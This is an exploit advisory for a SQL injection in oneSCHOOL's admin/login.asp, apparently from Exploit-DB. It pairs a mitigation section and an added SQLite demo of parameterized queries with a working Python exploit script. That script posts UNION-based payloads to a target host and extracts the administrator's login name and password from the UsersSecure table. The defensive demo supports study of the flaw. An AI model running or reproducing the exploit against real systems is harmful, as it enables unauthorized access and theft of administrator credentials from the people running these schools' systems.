Vendor: oneSCHOOL
By: Guga360
CVSS: 5.5 (MEDIUM)
CWE: 89 (SQL Injection)
Product Name: oneSCHOOL
Affected Version From: All versions
Affected Version To: All versions
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
Date: 2007

oneSCHOOL admin/login.asp SQL Injection exploit

This exploit performs a UNION-based SQL injection against the admin/login.asp page of the oneSCHOOL application. It retrieves a login name and the matching password from the UsersSecure table. The exploit applies to all versions of oneSCHOOL.

Mitigation:

To mitigate this vulnerability, validate and sanitize all user input before it is used in a SQL statement, and build the statement with parameterized queries or prepared statements so that input is bound as data rather than concatenated into SQL text. Parameterization is what actually closes the hole; input validation is a second layer, not a substitute.
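The following added example (not part of the advisory or the oneSCHOOL code base) shows why the concatenated login query fails and the parameterized one holds. It stands in for the login page with an in-memory SQLite table named UsersSecure (the table name comes from the advisory; the column names, rows and both login functions are assumed/constructed here) and feeds both functions a payload shaped like the advisory's txtLoginID value, reduced to this table's three columns.

```python
import sqlite3

# Constructed stand-in for the application's UsersSecure table.
# Table name is from the advisory; columns and rows are assumed.
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE UsersSecure (LoginName TEXT, Password TEXT, Role TEXT)")
    conn.executemany(
        "INSERT INTO UsersSecure VALUES (?, ?, ?)",
        [("admin", "123", "administrator"), ("teacher1", "s3cret", "staff")],
    )
    conn.commit()
    return conn


def login_vulnerable(conn, login_id, password):
    """Builds the statement by string concatenation: the pattern the advisory
    describes. Anything in login_id is parsed as SQL syntax."""
    sql = (
        "SELECT LoginName, Password, Role FROM UsersSecure "
        "WHERE LoginName = '" + login_id + "' AND Password = '" + password + "'"
    )
    return conn.execute(sql).fetchone()


def login_safe(conn, login_id, password):
    """Same query with bound parameters: the driver sends the values
    separately, so a quote inside login_id can never close the literal."""
    sql = (
        "SELECT LoginName, Password, Role FROM UsersSecure "
        "WHERE LoginName = ? AND Password = ?"
    )
    return conn.execute(sql, (login_id, password)).fetchone()


# Shape of the advisory's txtLoginID value, cut down to three columns so the
# UNION column count matches this toy table.
UNION_PAYLOAD = "' union select min(LoginName),1,1 from UsersSecure where LoginName>'a'--"


def demo():
    """Runs a legitimate login and the injected login through both versions."""
    conn = make_db()
    return {
        "valid_vulnerable": login_vulnerable(conn, "admin", "123"),
        "valid_safe": login_safe(conn, "admin", "123"),
        # Concatenation: the WHERE clause matches nothing, but the UNION
        # appends a row built from the table, and the trailing "--" comments
        # out the password check.
        "union_vulnerable": login_vulnerable(conn, UNION_PAYLOAD, "x"),
        # Parameterized: the whole payload is compared as a literal login name,
        # which no row has, so the query simply returns no row.
        "union_safe": login_safe(conn, UNION_PAYLOAD, "x"),
    }


if __name__ == "__main__":
    for label, row in demo().items():
        print(f"{label:>17}: {row}")
```

Running it shows the concatenated version answering the injected login with ("admin", 1, 1), i.e. a real account name leaked through the UNION, while the parameterized version returns None for the same input and still accepts the genuine credentials. The fix does not involve stripping or escaping characters; it changes how the statement is built.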

Exploit-DB raw data:

#!/usr/bin/python

#oneSCHOOL admin/login.asp SQL Injection exploit (for all versions)
#by Guga360.

import urllib
from sys import argv

query = {'txtOperation':'Login','txtLoginID':"""
' union select min(LoginName),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName>'a'--""",'txtPassword':'x','btnSubmit':'L+O+G+I+N+%3E%3E'}

queryx = urllib.urlencode(query)

if len(argv)<>2:
    print """
    **********
    
    Usage:
    oneSCHOOLxpl.py [host]

    [+] Exploiting...
    
    [+] User: admin
    [+] Password: 123
    
    *******************
    """
else:
    try:
        print '\n[+] Exploiting...\n'
        host = argv[1]        
        if host[0:7]<>'http://':
            host = 'http://'+host
        url = urllib.urlopen(host+'/admin/login.asp', queryx)
        url = url.read()
        url = url.split()
        name = url.index('varchar')+2
        name = url[name]
        name = name.replace("'","")
        print '[+] User: ' + name
        query2 = query.copy()
        query2['txtLoginID']="""' union select min(Password),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from UsersSecure where LoginName='"""+name+"""'--"""
        query2 = urllib.urlencode(query2)
        url = urllib.urlopen(host+'/admin/login.asp', query2)
        url = url.read()
        url = url.split()
        passw = url.index('varchar')+2
        passw = url[passw]
        passw = passw.replace("'","")
        print '[+] Pass: '+passw
    except:
        print '[+] Not vulnerable!'

# milw0rm.com [2007-12-31]